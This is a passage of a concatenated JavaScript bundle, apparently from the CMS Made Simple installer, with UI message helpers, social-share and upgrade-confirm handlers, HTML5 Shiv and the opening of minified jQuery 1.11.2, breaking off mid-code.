s=cssHelper.getViewportHeight();if(Math.abs(n-e)>d||Math.abs(s-t)>d){e=n;t=s;clearTimeout(r);r=setTimeout(function(){if(!i()){p()}else{cssHelper.broadcast("cssMediaQueriesTested")}},500)}};window.onresize=function(){var e=window.onresize||function(){};return function(){e();s()}}()};var m=document.documentElement;m.style.marginLeft="-32767px";setTimeout(function(){m.style.marginLeft=""},5e3);return function(){if(!i()){cssHelper.addListener("newStyleParsed",function(e){c(e.cssHelperParsed.stylesheet)});cssHelper.addListener("cssMediaQueriesTested",function(){if(ua.ie){m.style.width="1px"}setTimeout(function(){m.style.width="";m.style.marginLeft=""},0);cssHelper.removeListener("cssMediaQueriesTested",arguments.callee)});s();p()}else{m.style.marginLeft=""}v()}}());try{document.execCommand("BackgroundImageCache",false,true)}catch(e){}function add_message(str) {
    var theDiv = document.getElementById("inner");
    var newNode = document.createElement('p');
    newNode.className = 'message blue';
    newNode.innerHTML = str;
    theDiv.appendChild(newNode);
    theDiv.scrollTop = theDiv.scrollHeight;
}

function add_verbose(str) {
    var theDiv = document.getElementById("inner");
    var newNode = document.createElement('p');
    newNode.className = 'verbose';
    newNode.innerHTML = str;
    theDiv.appendChild(newNode);
    theDiv.scrollTop = theDiv.scrollHeight;
}

function add_error(str) {
    var theDiv = document.getElementById("inner");
    var newNode = document.createElement('p');
    newNode.innerHTML = str;
    newNode.className = 'message red';
    theDiv.appendChild(newNode);
    theDiv.scrollTop = theDiv.scrollHeight;
}

function set_block_html(id, html) {
    var theDiv = document.getElementById(id);
    theDiv.innerHTML = html;
}

function finish() {
    var theDiv = document.getElementById("bottom_nav");
    theDiv.style.display = 'block';
}

function socialShare() {

    // Twitter
    if (document.getElementById('twitter')) {
        document.getElementById('twitter').onclick = function() {
            window.open('https://twitter.com/intent/tweet?button_hashtag=cmsms&text=' + cmsms_lang.message, 'sharertwt', 'toolbar=0,status=0,width=540,height=345');
        };
    }
    // Google+
    if (document.getElementById('google')) {
        document.getElementById('google').onclick = function() {
            window.open('https://plus.google.com/share?url=http://www.cmsmadesimple.org', 'sharergplus', 'toolbar=0,status=0,width=524,height=505');
        };
    }
    // Facebook
    if (document.getElementById('facebook')) {
        document.getElementById('facebook').onclick = function() {
            window.open('http://www.facebook.com/sharer.php?u=http://www.cmsmadesimple.org', 'sharerfacebook', 'toolbar=0,status=0,width=525,height=368');
        };
    }
    // Linkedin
    if (document.getElementById('linkedin')) {
        document.getElementById('linkedin').onclick = function() {
            window.open('https://www.linkedin.com/cws/share?url=http%3A%2F%2Fwww.cmsmadesimple.org%2F&isFramed=true', 'sharerlinkedin', 'toolbar=0,status=0,width=540,height=528');
        };
    }

}

window.onload = function() {
    var freshen = document.getElementById('freshen'),
        upgrade = document.getElementById('upgrade');

    if( freshen ) {
        freshen.onclick = function() {
            return confirm(cmsms_lang.freshen);
        };
    }
    if( upgrade ) {
        upgrade.onclick = function() {
            return confirm(cmsms_lang.upgrade);
        };
    }

    socialShare();
};

function add_message(str){var theDiv=document.getElementById("inner");var newNode=document.createElement('p');newNode.className='message blue';newNode.innerHTML=str;theDiv.appendChild(newNode);theDiv.scrollTop=theDiv.scrollHeight;}
function add_verbose(str){var theDiv=document.getElementById("inner");var newNode=document.createElement('p');newNode.className='verbose';newNode.innerHTML=str;theDiv.appendChild(newNode);theDiv.scrollTop=theDiv.scrollHeight;}
function add_error(str){var theDiv=document.getElementById("inner");var newNode=document.createElement('p');newNode.innerHTML=str;newNode.className='message red';theDiv.appendChild(newNode);theDiv.scrollTop=theDiv.scrollHeight;}
function set_block_html(id,html){var theDiv=document.getElementById(id);theDiv.innerHTML=html;}
function finish(){var theDiv=document.getElementById("bottom_nav");theDiv.style.display='table';}
function socialShare(){if(document.getElementById('twitter')){document.getElementById('twitter').onclick=function(){window.open('https://twitter.com/intent/tweet?button_hashtag=cmsms&text='+cmsms_lang.message,'sharertwt','toolbar=0,status=0,width=540,height=345');};}
if(document.getElementById('google')){document.getElementById('google').onclick=function(){window.open('https://plus.google.com/share?url=http://www.cmsmadesimple.org','sharergplus','toolbar=0,status=0,width=524,height=505');};}
if(document.getElementById('facebook')){document.getElementById('facebook').onclick=function(){window.open('http://www.facebook.com/sharer.php?u=http://www.cmsmadesimple.org','sharerfacebook','toolbar=0,status=0,width=525,height=368');};}
if(document.getElementById('linkedin')){document.getElementById('linkedin').onclick=function(){window.open('https://www.linkedin.com/cws/share?url=http%3A%2F%2Fwww.cmsmadesimple.org%2F&isFramed=true','sharerlinkedin','toolbar=0,status=0,width=540,height=528');};}}
window.onload=function(){var freshen=document.getElementById('freshen'),upgrade=document.getElementById('upgrade');if(freshen){freshen.onclick=function(){return confirm(cmsms_lang.freshen);};}
if(upgrade){upgrade.onclick=function(){return confirm(cmsms_lang.upgrade);};}
socialShare();};/*
 HTML5 Shiv v3.7.0 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
*/
(function(l,f){function m(){var a=e.elements;return"string"==typeof a?a.split(" "):a}function i(a){var b=n[a[o]];b||(b={},h++,a[o]=h,n[h]=b);return b}function p(a,b,c){b||(b=f);if(g)return b.createElement(a);c||(c=i(b));b=c.cache[a]?c.cache[a].cloneNode():r.test(a)?(c.cache[a]=c.createElem(a)).cloneNode():c.createElem(a);return b.canHaveChildren&&!s.test(a)?c.frag.appendChild(b):b}function t(a,b){if(!b.cache)b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag();
a.createElement=function(c){return!e.shivMethods?b.createElem(c):p(c,a,b)};a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+m().join().replace(/[\w\-]+/g,function(a){b.createElem(a);b.frag.createElement(a);return'c("'+a+'")'})+");return n}")(e,b.frag)}function q(a){a||(a=f);var b=i(a);if(e.shivCSS&&!j&&!b.hasCSS){var c,d=a;c=d.createElement("p");d=d.getElementsByTagName("head")[0]||d.documentElement;c.innerHTML="x<style>article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}</style>";
c=d.insertBefore(c.lastChild,d.firstChild);b.hasCSS=!!c}g||t(a,b);return a}var k=l.html5||{},s=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,r=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,j,o="_html5shiv",h=0,n={},g;(function(){try{var a=f.createElement("a");a.innerHTML="<xyz></xyz>";j="hidden"in a;var b;if(!(b=1==a.childNodes.length)){f.createElement("a");var c=f.createDocumentFragment();b="undefined"==typeof c.cloneNode||
"undefined"==typeof c.createDocumentFragment||"undefined"==typeof c.createElement}g=b}catch(d){g=j=!0}})();var e={elements:k.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output progress section summary template time video",version:"3.7.0",shivCSS:!1!==k.shivCSS,supportsUnknownElements:g,shivMethods:!1!==k.shivMethods,type:"default",shivDocument:q,createElement:p,createDocumentFragment:function(a,b){a||(a=f);
if(g)return a.createDocumentFragment();for(var b=b||i(a),c=b.frag.cloneNode(),d=0,e=m(),h=e.length;d<h;d++)c.createElement(e[d]);return c}};l.html5=e;q(f)})(this,document);
/*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)+1>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||m.guid++,e):void 0},now:function(){return+new Date},support:k}),m.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function r(a){var b=a.length,c=m.type(a);return"function"===c||m.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var s=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=hb(),z=hb(),A=hb(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-1},K="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",L="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N=M.replace("w","w#"),O="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+N+"))|)"+L+"*\\]",P=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+O+")*)|.*)\\)|)",Q=new RegExp(L+"+","g"),R=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),S=new RegExp("^"+L+"*,"+L+"*"),T=new RegExp("^"+L+"*([>+~]|"+L+")"+L+"*"),U=new RegExp("="+L+"*([^\\]'\"]*?)"+L+"*\\]","g"),V=new RegExp(P),W=new RegExp("^"+N+"$"),X={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new RegExp("^"+O),PSEUDO:new RegExp("^"+P),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+L+"*(even|odd|(([+-]|)(\\d*)n|)"+L+"*(?:([+-]|)"+L+"*(\\d+)|))"+L+"*\\)|)","i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+L+"*((?:-\\d)?\\d*)"+L+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},eb=function(){m()};try{H.apply(E=I.call(v.childNodes),v.childNodes),E[v.childNodes.length].nodeType}catch(fb){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function gb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],k=b.nodeType,"string"!=typeof a||!a||1!==k&&9!==k&&11!==k)return d;if(!e&&p){if(11!==k&&(f=_.exec(a)))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return H.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName)return H.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=1!==k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+rb(o[l]);w=ab.test(a)&&pb(b.parentNode)||b,x=o.join(",")}if(x)try{return H.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function hb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ib(a){return a[u]=!0,a}function jb(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function kb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function lb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function nb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function ob(a){return ib(function(b){return b=+b,ib(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function pb(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=gb.support={},f=gb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=gb.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=g.documentElement,e=g.defaultView,e&&e!==e.top&&(e.addEventListener?e.addEventListener("unload",eb,!1):e.attachEvent&&e.attachEvent("onunload",eb)),p=!f(g),c.attributes=jb(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=jb(function(a){return a.appendChild(g.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(g.getElementsByClassName),c.getById=jb(function(a){return o.appendChild(a).id=u,!g.getElementsByName||!g.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(g.querySelectorAll))&&(jb(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\f]' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+L+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+L+"*(?:value|"+K+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),jb(function(a){var b=g.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&jb(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",P)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===g||a.ownerDocument===v&&t(v,a)?-1:b===g||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,h=[a],i=[b];if(!e||!f)return a===g?-1:b===g?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return lb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?lb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},g):n},gb.matches=function(a,b){return gb(a,null,null,b)},gb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return gb(b,n,null,[a]).length>0},gb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},gb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},gb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},gb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=gb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=gb.selectors={cacheLength:50,createPseudo:ib,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||gb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&gb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+L+")"+a+"("+L+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=gb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(Q," ")+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||gb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ib(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ib(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?ib(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ib(function(a){return function(b){return gb(a,b).length>0}}),contains:ib(function(a){return a=a.replace(cb,db),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ib(function(a){return W.test(a||"")||gb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:ob(function(){return[0]}),last:ob(function(a,b){return[b-1]}),eq:ob(function(a,b,c){return[0>c?c+b:c]}),even:ob(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:ob(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:ob(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:ob(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=mb(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=nb(b);function qb(){}qb.prototype=d.filters=d.pseudos,d.setFilters=new qb,g=gb.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){(!c||(e=S.exec(h)))&&(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=T.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(R," ")}),h=h.slice(c.length));for(g in d.filter)!(e=X[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?gb.error(a):z(a,i).slice(0)};function rb(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function sb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function tb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function ub(a,b,c){for(var d=0,e=b.length;e>d;d++)gb(a,b[d],c);return c}function vb(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function 